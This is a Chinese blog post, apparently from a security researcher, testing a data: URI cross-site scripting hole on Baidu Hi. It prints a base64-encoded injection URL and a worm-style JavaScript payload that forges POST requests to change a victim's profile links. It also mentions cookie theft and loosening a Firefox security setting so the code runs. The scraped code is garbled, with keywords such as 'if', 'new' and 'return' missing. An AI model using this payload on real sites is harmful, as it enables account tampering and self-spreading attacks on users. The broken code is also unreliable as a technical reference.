Data:_URI_scheme
:http://superhei.blogbus.com/logs/23355141.html
我拿这个做了下实验:http://hi.baidu.com/xss?jump_url=data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzEyNy4wLjAuMS9iYWlkdS5qcz48L3NjcmlwdD4NCg
我要验证两个问题
个是这样进来XSS威力有多大;个是我这里提到想法http://www.0x37.com/post/34.html(XSS Worm: About XHR POST Form Data)、XSS Worm: About XHR POST Form Data:解密上面URL中
base64值得到:<script src=http://127.0.0.1/baidu.js></script>其中baidu.js代码如下:var _x=false;
(window.XMLHttpRequest){_x=
XMLHttpRequest
;}
(window.ActiveXObject){_x=
ActiveXObject("Msxml2.XMLHTTP");(!_x){_x= ActiveXObject("Microsoft.XMLHTTP");}}
_1
;function _1
{src="http://hi.baidu.com/ycosxhack/commit";
argv_1="\r\n";
argv_1
"---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ct\"\r\n\r\n";argv_1
("9"+"\r\n");argv_1
"---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"cm\"\r\n\r\n";argv_1
("1"+"\r\n");argv_1
"---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkID\"\r\n\r\n";argv_1
("11"+"\r\n");argv_1
"---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkLabel\"\r\n\r\n";argv_1
("%B9%AB%B8%E6"+"\r\n");argv_1
"---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spRefURL\"\r\n\r\n";argv_1
("http%3A%2F%2Fhi.baidu.com%2Fycosxhack%2Fmody%2Fmylink%2F11"+"\r\n");argv_1
"---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkName\"\r\n\r\n";argv_1
("test"+"\r\n");argv_1
"---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkURL\"\r\n\r\n";argv_1
("http://www.0x37.com/"+"\r\n");argv_1
"---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkIntro\"\r\n\r\n";argv_1
("hi~: 0x37.com"+"\r\n");argv_1
"---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkSign\"\r\n\r\n";argv_1
(""+"\r\n");argv_1
"---------------------7964f8dddeb95fc5--\r\n";result=_3or7("POST",src,argv_1);
alert(result);
}
//_2
;function _2
{src="http://hi.baidu.com/ycosxhack/commit";
ct=9;
cm=1;
spMyLinkID=11;
spMyLinkLabel='%B9%AB%B8%E6';
spRefURL='http%3A%2F%2Fhi.baidu.com%2Fycosxhack%2Fmod
y%2Fmylink%2F11';spMyLinkName='test';
spMyLinkURL='http://www.0x37.com/';
spMyLinkIntro='hi~: 0x37 Security:)';
spMyLinkSign='';
_d="ct="+ct+"&cm="+cm+"&spMyLinkID="+spMyLinkID+"&spMyLinkLabel="+spMyLinkLabel+"&spRefURL="+spRefURL+"&spMyLinkName="+spMyLinkName+"&spMyLinkURL="+spMyLinkU
RL+"&spMyLinkIntro="+spMyLinkIntro+"&spMyLinkSign="+spMyLinkSign;
result=postdata(src,_d);
alert(result);
}
function postdata(_s,_a){
try{netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");}catch(e){alert("Permission UniversalBrowserRead denied.");}
_x.open("POST", _s, false);
_x.
RequestHeader('Content-Type', 'application/x-www-form-urlencoded');_x.send(_a);
_x.responseText;}
function _3or7(_m,_s,_a){
try{netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");}catch(e){alert("Permission UniversalBrowserRead denied.");}
_x.open(_m,_s,false);
(_m"POST")_x.RequestHeader("Content-Type","multipart/form-data; boundary=-------------------7964f8dddeb95fc5");_x.send(_a);
_x.responseText;}
_1
是multipart/form-data型表单而_2是application/x-www-form-urlencoded型表单(默认)OK这次测试发现只有_2执行成功这就证明了XSS Worm: About XHR POST Form Data想法其余就不多说了2、data URI XSS
威力:不大
盗盗cookie等如果想用这个来模拟表单提交过程就不行了上面baidu.js代码在FF下默认是不能执行我做这个实验的前先将FFabout:config中signed.applets.codebase_principal_support设置为true然后在_x.open的前添加try{netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");}catch(e){alert("Permission UniversalBrowserRead denied.");}结果测试时会弹出如下对话框:
点击“是”的后
蠕虫代码成功执行否则话会出现如下
:
这应该是指跨域受限制
权限不足了吧篇文章: 
集导致浏览器跨站脚本攻击篇文章: 对抗启发式代码仿真检测技术分析
最新评论